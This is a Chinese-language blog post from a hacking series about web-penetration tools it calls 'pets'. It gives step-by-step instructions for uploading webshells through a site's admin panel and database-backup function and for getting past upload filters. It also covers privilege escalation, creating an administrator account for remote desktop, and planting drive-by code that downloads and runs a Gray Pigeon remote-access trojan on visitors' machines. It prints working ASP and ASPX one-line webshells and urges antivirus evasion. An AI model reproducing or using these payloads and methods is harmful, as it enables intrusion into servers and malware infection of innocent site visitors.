美文网首页
那些年陪伴我的“宠物”

那些年陪伴我的“宠物”

作者: 毛利小伍宁 | 来源:发表于2016-06-10 12:59 被阅读138次

      二话不说,直接正文!

      对于大多数人来说,木马病毒是具有破坏功能的程序罢了。但为了达到不同的功能,在实际应用情况中,它们又各有各自的功用。其实,许多软件程序并不带有破坏的能力,而他们所具有的强大功能,使得杀软公司不得不将他们列入黑名单中。接下来,我就为大家讲讲在web渗透攻击中,常常用到的那些“宠物”。

    webshell

      它是基于网络管理员为了方便网站和服务器间的管理,以网页文本形式存在的命令行形式的执行环境。通过webshell我们无法直接浏览网页效果,它以文件和文件夹形式向管理员展示。通过webshell我们可以清楚地看到文件中的源代码,并根据自己的需要进行修改。以及看到服务器对应开启的端口和服务,包括服务器上所安装的软件。当然,在实际情况中,管理员为了不让破坏者可以随意修改服务器上的文件内容,通常会对其进行权限设置,使得webshell仅仅具有“只读”的权限而无法写入内容。一般webshell的格式通常为asp/php/jsp/cgi等等,其中asp和php是最为常见的。在这里分享一个简单的webshell使用上传的方法(简述):通过我在之前讲述的方法中,我们首先进入网站后台。并找到新闻或者文章发布编辑的功能,我们创建一个新的文章,在里面上传文件,上传你所准备好的webshell文件,之后提交上传。这个时候记录下你文件上传的地址(至少在渗透测试时,一个良好的习惯是随时准备记事本记录),然后找到后台数据库备份功能,将刚才的地址粘贴,对你的文件进行备份功能,如果提示成功,记录下备份成功的地址,然后在浏览器中打开,就可以看到你上传的webshell,然后输入密码登录就可以进去了。

    登录 webshell

    在实际情况中,我们会遇到以下问题。文件上传失败:失败原因很多种,一般情况是服务器上有自带的杀软。对付这种情况,我们需要一个免杀的webshell即可,一般网上也会有的,自己去仔细找找。还有就是提示文件上传格式不对,其实,为了防止自己服务器被攻击,管理员都会禁止上传类似php/asp这样的文件。遇到这种情况并不代表自己没办法了,我们首先要确定服务器的类型,是否是iis搭建(具体方法,可以参照sql注入里的内容),如果是利用iis,我们这时候可以更改webshell的文件格式,通过上传图片实现webshell的成功上传。而iis是过滤文件打开格式的,所以只需要在浏览器打开webshell的格式中更换回来就可以正常打开了。不过现在一般大中型网站不具有数据库备份功能,所以这个简单的方法还是具有一定的局限性的。除了可以查看文件,其实最主要的功能,就是提权,一般webshell自带提权功能(有局限)。成功提权后,我们就可以在webshell中打开命令行,创建一个管理员,然后利用3389登录服务器,这意味着你攻击下了一台服务器——恭喜!(虽然很理想化,但对于小型网站足够了) 那么对于webshell的优劣我也不做介绍了,其实之前我也都提到了。那就介绍下一个了。(webshell大同小异,我就不特别推荐了)

    小马

      小马,其实和webshell一样,说是马,其实它并不具木马可破坏的特点。但它的所具有的小巧、隐蔽性,一直备受黑客们的喜爱。即使我们成功上传了webshell但对于隐蔽性来说他远远不及小马,所以就算入侵成功也很可能被管理员在服务器上删除,但小马体积小,方便隐藏,所以我们会利用小马来上传我们的大马(webshell的一个诨名),大小马搭配天衣无缝。这也就是小马的功能,上传文件!(它没别的功能了,所以和大马需要做到搭配使用)一般小马的使用和上传和之前webshell说到的方法一模一样,也可以用备份功能。

    小马

    将文件利用记事本功能打开,将内容复制粘贴到小马里,然后创建一个文件名上传,提示成功后就可以使用了。但在这里我要为大家推荐一种特别的小马——一句话木马。一句话木马听上去高深莫测,仅仅一句话就是木马,但实际情况是这一句话正是SQL注入中提到的SQL语句罢了。我们通过使用的SQL语句注入到数据库中(可以留言到留言板或者发文章等等方法),然后利用一句话木马的客户端连接即可。在客户端中,我们需要输入数据库地址(方法在前面SQL注入中有提到),然后键入自己要提交的内容后,然后连接数据库提交就可以了。这时候如果成功,记录下上传地址后打开即可。

    常用一句话木马

    asp一句话木马:

    <%execute(request("value"))%>

    aspx一句话木马:

    <%@ Page Language="Jscript"%>

    <%eval(Request.Item["value"])%>

    PHP的一句话简书给我过滤了...感兴趣的话自己去网上百度一下就可以了。

    客户端

    这里我推荐中国菜刀和桂林老兵的一句话木马,当然它们两者功能不仅仅于此

    网马

    我们经常会听到什么网站被挂马攻击了,吓得我们也不敢去该网页浏览自己需要的内容。但是所谓的网马又究竟是什么呢?这里的网马其实有别于之前提到的大小马,它是真正具有破坏能力的木马,还记得我在溢出攻击中提到的灰鸽子吗?这里的网马可以是它!网马的生成其实很简单,首先成功生成一个灰鸽子(还是我之前提到的内容),然后一个网马生成器。如果你的灰鸽子木马是放在一个FTP服务器上的,那么在网马生成器中键入这个地址,然后本地上传木马(根据具体情况)点击确定生成就可以了,就这么简单,没了!你也可以利用免费空间上传。

    网马生成器

    然后我们会得到一行代码,我们复制这行代码,然后利用webshell在网站首页或者非首页中(一般为index文件是首页地址),找到合适的位置(不破坏首页结构)然后粘贴即可。它的原理是,当计算机浏览该网页时,读到这行代码的时候,它会根据提供的地址去索引,然后根据这个地址去下载并执行,这时候我们的灰鸽子客户端就会提示主机上线了!这就是网马的使用,不过还是强烈建议要做到免杀,毕竟现在基本上计算机上都会装个免费的360.

      这周更新的速度有点慢。最近有点忙,如果没有及时更新,我也会在后面补齐的,希望大家理解。这次的内容虽然是对“宠物”介绍,而实际上我们会发现它们的使用和之前所提到的内容有着紧密关系,也希望大家多去实践,才能做到驾轻就熟。当然实践前提是不给他人带来不便,若造成了涉及法律的问题,笔者不承担任何法律责任。

    谢谢大家一如既往的支持,每周更新!

    相关文章

      网友评论

          本文标题:那些年陪伴我的“宠物”

          本文链接:https://www.haomeiwen.com/subject/itssdttx.html